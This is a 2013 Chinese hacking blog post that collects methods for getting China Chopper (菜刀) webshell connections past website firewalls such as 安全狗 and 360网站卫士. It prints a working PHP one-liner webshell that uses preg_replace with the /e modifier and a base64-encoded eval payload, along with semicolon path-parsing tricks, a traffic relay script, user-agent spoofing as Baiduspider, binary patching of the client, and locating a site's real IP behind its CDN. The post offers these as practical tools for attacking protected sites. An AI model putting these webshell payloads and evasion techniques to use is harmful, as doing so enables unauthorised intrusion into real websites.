绕过各种卫士拦截菜刀连接的那些事

最近几年,各种对网站安全防护的免费产品风起云涌,单机版的就算安全狗,在线的就多了安全宝啊,360网站卫士啊,云盾啊,DNSPOD都集成宝宝了,搞得很多黑客的菜刀连接不上,于是各种大法出来了。

这几天看了些文章,做个整理。

第一种,各种分号
/;.shell.asp;.jpg
/;1.asp/1.jpg

新版不知道拦截不,分号位置很重要,好像分号放在/前面成功率高。连接不上的时候,把;编码一下%3B。

第二种,鬼哥弄的中转,原来就是把菜刀提交的内容在这个中转文件替换修改一下,之后各种狗就不拦截了。

下载文件 点击下载此文件

鬼哥写的用法:
用法: 先把这个脚本放到个可执行.asp的目录
然后访问http://www.xx.com/asf.asp?dz=你要过的那个webshell地址
然后把地址输入进菜刀 密码还是你要过的那个webshell的密码 类型也是选择那个一句话木马的后缀类型
例如:http://www.xx.com/asf.asp?dz=http://xxx.com/yijuhua.php 密码
这个脚本暂时支持.php .aspx的一句话连接  .asp的可能还不行 没测试过

第三种,从第二种可以看出替换关键词就可以过狗狗,那么直接从菜刀入手不是也行吗,从上面代码也看得出,主要是查杀eval和post,于是骚总和落叶想出来办法,0D载入 nop掉这2个关键词。

之后
一句话:
程序代码 程序代码
<?php preg_replace("/^/e",base64_decode($_REQUEST[g]),0);?>

菜刀连接,密码随便填
程序代码 程序代码
http://192.168.100.193/s.php?g=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFt6MF0pKQ==


密文解码就是
程序代码 程序代码
eval(base64_decode($_REQUEST[z0]))


万恶的/e修正符,这里搞了2次base64加密。第一次传过去的是密文,服务端解码后继续执行菜刀提交的命令密文。也就是z0的内容了。

第四种,伪装爬虫,一般的waf都要开放爬虫的,不然网站没人收录了。于是修改user-agent伪装spider。
还是对菜刀动手。
看到的文章中是用OD载入,之后查找Firefox
得到:Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
之后c32修改为:Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)

我也测试了一下,Firefox是没有找到,但是windows是一定有的。

我的菜刀是

程序代码 程序代码
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)


点击放大图片

之后XXOO吧。

第五种,也是伪装user-agent,blacksplit很巧妙的用架设本地代理的方式来伪装user-agent。

点击放大图片

首先假设一个代理,ie设置之后,那么ie的流量就从这个端口过。

指定域名,也就是只正对目标站修改user-agent,减少工作量。

get改为post好像是过智创waf的吧。

用了这东东,啥工具都好使了,呵呵

如果一定要给一点意见的话,能自定义替换eval,post等关键词,那就更完美了。

下载文件 点击下载此文件

第六种,说修改USER-AGENT,firefox也可以。
https://addons.mozilla.org/zh-cn/firefox/addon/user-agent-switcher/

安装之,就能随时切换了。

点击放大图片

附送一个强大的user-agent文件,呵呵




第七种,上次弄一个网站,加入了360网站卫士,一句话搞了半天连接不上,转了半天才搞懂,cdn了。直接过狗菜刀XXX,之后拿到真实地址,修改系统host

程序代码 程序代码
原始地址     www.target.com


嘿嘿,隐藏真实地址很重要哦,不然加入360,安全宝也是白瞎啊。


daokers
2013.8.18




以下说明属本文之一部分:
转载请保持完整并注明:转自 金刀客[www.daokers.com]


[本日志由 admin 于 2013-08-18 09:07 PM 编辑]
相关日志:
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
在线RSS阅读器订阅:
feedsky
抓虾 pageflakes Rojo google reader
my yahoo newsgator bloglines 有道
鲜果 飞豆 哪吒 Netvibes
Netvibes Netvibes

手机订阅:


本站订阅地址:
RSS2:点击复制
Atom:点击复制
        本站所有原创文章均遵循 [创作共用协议]
        本站原创文章可以转载,但须保持完整性并注明出处。
        COPYRIGHT 2008-2010  §  HTTP://WWW.DAOKERS.COM  §    ALL RIGHTS
评论: 1 | 引用: 0 | 查看次数: -
回复回复lizhaoxi123[2013-12-24 08:45 AM | del]
学习了,呵呵呵额
发表评论
昵 称:
密 码: 游客发言不需要密码.
验证码: 验证码提示:单击自动获取验证码
内 容:
最多可输入,当前共,还可输入
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.